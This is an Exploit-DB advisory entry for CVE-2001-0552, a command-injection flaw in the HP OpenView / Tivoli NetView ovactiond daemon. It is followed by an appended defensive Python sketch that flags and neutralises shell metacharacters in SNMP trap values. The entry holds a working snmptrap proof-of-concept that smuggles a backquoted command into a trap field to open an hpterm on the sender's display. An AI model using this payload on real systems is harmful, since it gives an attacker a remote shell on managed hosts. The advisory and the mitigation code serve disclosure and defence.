IBM Tivoli NetView 5/6 OVActionD SNMPNotify Command Execution Vulnerability

2001-06-08T00:00:00
ID EDB-ID:20909
Type exploitdb
Reporter Milo van der Zee
Modified 2001-06-08T00:00:00

Description

IBM Tivoli NetView 5/6 OVActionD SNMPNotify Command Execution Vulnerability. CVE-2001-0552. Remote exploit for multiple platforms.

                                        
source: http://www.securityfocus.com/bid/2845/info

ovactiond is part of the system management software packages OpenView and NetView, distributed by HP and IBM. It is designed for use on enterprise systems and offers remote administrative facilities.

A flaw in the software allows a remote user to execute commands on a managed system with the privileges of the ovactiond process (often 'bin' on Unix systems). In its default configuration as installed with HP OpenView, the daemon executes commands when it receives a trap with the command encapsulated in quotes and escapes. Tivoli NetView is not vulnerable to this by default, but may be if customized.

snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1 s "" 2 s "" 3 s "\`/usr/bin/X11/hpterm -display <your client display>\`" 4 s "" [snip...] 12 s ""
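
A defensive sketch of the trap-handling side, added here as an example and not taken from the advisory or from HP or IBM code: it flags trap string values that contain shell metacharacters and expands an action into an argument list, so a backquoted value is never interpreted by a shell. The `$N` template syntax, the function names and the sample values are assumptions made for the illustration.

```python
import re
import shlex

# Characters that let a string value alter a shell command line.
SHELL_META = set("`$;|&<>(){}\\\n'\"")

# Constructed sample: (varbind index, string value) pairs from one trap.
SAMPLE_VARBINDS = [(1, "node-a"), (2, "linkDown"), (3, "`echo constructed`")]

# Hypothetical action template; $N stands for varbind N (an assumption).
ACTION_TEMPLATE = 'logger -t trap "$1 $2 $3"'


def suspicious_varbinds(varbinds):
    """Return the varbinds whose value contains a shell metacharacter."""
    return [(i, v) for i, v in varbinds if SHELL_META & set(v)]


def build_action_argv(template, varbinds):
    """Expand $N placeholders into an argv list without involving a shell.

    The template is split into arguments first, so each substituted value
    stays inside one argument and backquotes in it remain literal text.
    """
    values = dict(varbinds)
    return [
        re.sub(r"\$(\d+)", lambda m: values.get(int(m.group(1)), ""), token)
        for token in shlex.split(template)
    ]


if __name__ == "__main__":
    print("flagged:", suspicious_varbinds(SAMPLE_VARBINDS))
    # Pass this list to subprocess.run(argv) with the default shell=False.
    print("argv:", build_action_argv(ACTION_TEMPLATE, SAMPLE_VARBINDS))
```

A flagged varbind is worth logging together with the sending agent address even when the action is run safely, since it indicates someone is probing the trap receiver.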